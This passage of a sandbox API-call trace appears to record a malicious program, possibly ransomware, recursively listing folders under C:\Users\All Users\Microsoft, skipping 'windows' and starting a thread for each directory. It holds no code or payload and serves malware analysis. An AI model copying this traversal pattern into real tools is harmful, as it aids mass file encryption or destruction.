(lpString1=".", lpString2="MF") returned -1 [0040.336] lstrcmpW (lpString1="..", lpString2="MF") returned -1 [0040.336] lstrcmpiW (lpString1="windows", lpString2="MF") returned 1 [0040.338] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0040.338] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0040.338] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="MF" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF" [0040.338] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*" [0040.338] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0040.338] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10dfee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0040.339] CloseHandle (hObject=0x270) returned 1 [0040.339] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSDN", cAlternateFileName="")) returned 1 [0040.339] lstrcmpW (lpString1=".", lpString2="MSDN") returned -1 [0040.339] lstrcmpW (lpString1="..", lpString2="MSDN") returned -1 [0040.339] lstrcmpiW (lpString1="windows", lpString2="MSDN") returned 1 [0040.341] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0040.341] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0040.341] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="MSDN" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN" [0040.341] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\*.*" [0040.341] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0040.341] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10e16e90, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0040.342] CloseHandle (hObject=0x270) returned 1 [0040.342] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1 [0040.342] lstrcmpW (lpString1=".", lpString2="NetFramework") returned -1 [0040.342] lstrcmpW (lpString1="..", lpString2="NetFramework") returned -1 [0040.342] lstrcmpiW (lpString1="windows", lpString2="NetFramework") returned 1 [0040.343] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0040.343] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0040.344] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="NetFramework" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework" [0040.344] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*" [0040.344] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0040.344] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10e2eef8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0040.774] CloseHandle (hObject=0x270) returned 1 [0040.774] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0040.774] lstrcmpW (lpString1=".", lpString2="Network") returned -1 [0040.774] lstrcmpW (lpString1="..", lpString2="Network") returned -1 [0040.774] lstrcmpiW (lpString1="windows", lpString2="Network") returned 1 [0041.170] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0041.170] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0041.170] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="Network" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network" [0041.170] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*.*" [0041.170] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0041.171] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4238660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3bc [0041.174] CloseHandle (hObject=0x3bc) returned 1 [0041.174] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE", cAlternateFileName="")) returned 1 [0041.174] lstrcmpW (lpString1=".", lpString2="OFFICE") returned -1 [0041.174] lstrcmpW (lpString1="..", lpString2="OFFICE") returned -1 [0041.174] lstrcmpiW (lpString1="windows", lpString2="OFFICE") returned 1 [0041.176] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0041.176] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0041.176] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="OFFICE" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE" [0041.176] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\*.*" [0041.176] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0041.176] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1128c030, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3bc [0041.182] CloseHandle (hObject=0x3bc) returned 1 [0041.182] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0xfa44d4a0, ftLastWriteTime.dwHighDateTime=0x1d305fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0041.182] lstrcmpW (lpString1=".", lpString2="OfficeSoftwareProtectionPlatform") returned -1 [0041.182] lstrcmpW (lpString1="..", lpString2="OfficeSoftwareProtectionPlatform") returned -1 [0041.182] lstrcmpiW (lpString1="windows", lpString2="OfficeSoftwareProtectionPlatform") returned 1 [0041.184] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0041.184] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0041.184] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="OfficeSoftwareProtectionPlatform" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform" [0041.184] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*" [0041.184] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0041.184] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x112a4098, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3bc [0041.186] CloseHandle (hObject=0x3bc) returned 1 [0041.186] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RAC", cAlternateFileName="")) returned 1 [0041.186] lstrcmpW (lpString1=".", lpString2="RAC") returned -1 [0041.186] lstrcmpW (lpString1="..", lpString2="RAC") returned -1 [0041.186] lstrcmpiW (lpString1="windows", lpString2="RAC") returned 1 [0041.188] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0041.188] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0041.188] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="RAC" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC" [0041.188] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*.*" [0041.188] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0041.188] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x112bc100, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3bc [0041.192] CloseHandle (hObject=0x3bc) returned 1 [0041.192] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27df8b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27df8b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0041.192] lstrcmpW (lpString1=".", lpString2="Search") returned -1 [0041.192] lstrcmpW (lpString1="..", lpString2="Search") returned -1 [0041.192] lstrcmpiW (lpString1="windows", lpString2="Search") returned 1 [0041.194] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0041.194] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0041.194] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="Search" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search" [0041.194] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*.*" [0041.194] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0041.194] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x112d4168, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3bc [0041.198] CloseHandle (hObject=0x3bc) returned 1 [0041.198] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Account Pictures", cAlternateFileName="USERAC~1")) returned 1 [0041.198] lstrcmpW (lpString1=".", lpString2="User Account Pictures") returned -1 [0041.198] lstrcmpW (lpString1="..", lpString2="User Account Pictures") returned -1 [0041.198] lstrcmpiW (lpString1="windows", lpString2="User Account Pictures") returned 1 [0041.200] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0041.200] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0041.200] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="User Account Pictures" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures" [0041.200] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*" [0041.200] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0041.200] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11304238, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3bc [0041.207] CloseHandle (hObject=0x3bc) returned 1 [0041.207] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vault", cAlternateFileName="")) returned 1 [0041.207] lstrcmpW (lpString1=".", lpString2="Vault") returned -1 [0041.207] lstrcmpW (lpString1="..", lpString2="Vault") returned -1 [0041.207] lstrcmpiW (lpString1="windows", lpString2="Vault") returned 1 [0041.209] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0041.209] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0041.209] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="Vault" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault" [0041.209] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\*.*" [0041.209] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0041.209] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1134c370, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3bc [0041.214] CloseHandle (hObject=0x3bc) returned 1 [0041.214] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISIO", cAlternateFileName="")) returned 1 [0041.214] lstrcmpW (lpString1=".", lpString2="VISIO") returned -1 [0041.214] lstrcmpW (lpString1="..", lpString2="VISIO") returned -1 [0041.214] lstrcmpiW (lpString1="windows", lpString2="VISIO") returned 1 [0041.216] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0041.216] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0041.216] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="VISIO" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO" [0041.216] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\*.*" [0041.216] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0041.217] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x113643d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3bc [0041.219] CloseHandle (hObject=0x3bc) returned 1 [0041.219] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x60ae73a0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x60ae73a0, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0041.219] lstrcmpW (lpString1=".", lpString2="Windows") returned -1 [0041.219] lstrcmpW (lpString1="..", lpString2="Windows") returned -1 [0041.219] lstrcmpiW (lpString1="windows", lpString2="Windows") returned 0 [0041.219] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x591e8ca0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x591e8ca0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1 [0041.219] lstrcmpW (lpString1=".", lpString2="Windows Defender") returned -1 [0041.219] lstrcmpW (lpString1="..", lpString2="Windows Defender") returned -1 [0041.219] lstrcmpiW (lpString1="windows", lpString2="Windows Defender") returned -1 [0041.221] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0041.221] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0041.221] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="Windows Defender" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender" [0041.221] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*" [0041.221] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0041.221] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1137c440, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3bc [0041.228] CloseHandle (hObject=0x3bc) returned 1 [0041.228] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0041.228] lstrcmpW (lpString1=".", lpString2="Windows NT") returned -1 [0041.229] lstrcmpW (lpString1="..", lpString2="Windows NT") returned -1 [0041.229] lstrcmpiW (lpString1="windows", lpString2="Windows NT") returned -1 [0041.231] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0041.231] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0041.231] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", lpString2="Windows NT" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT" [0041.231] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*" [0041.231] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0041.231] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x113c4578, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3bc [0041.234] CloseHandle (hObject=0x3bc) returned 1 [0041.234] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WwanSvc", cAlternateFileName="")) returned 1 [0041.234] lstrcmpW (lpString1=".", lpString2="WwanSvc") returned -1 [0041.234] lstrcmpW (lpString1="..", lpString2="WwanSvc") returned -1 [0041.234] lstrcmpiW (lpString1="windows", lpString2="WwanSvc") returned -1 [0041.622] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*" [0041.622] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\*.*") returned 36 [0041.622] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\", 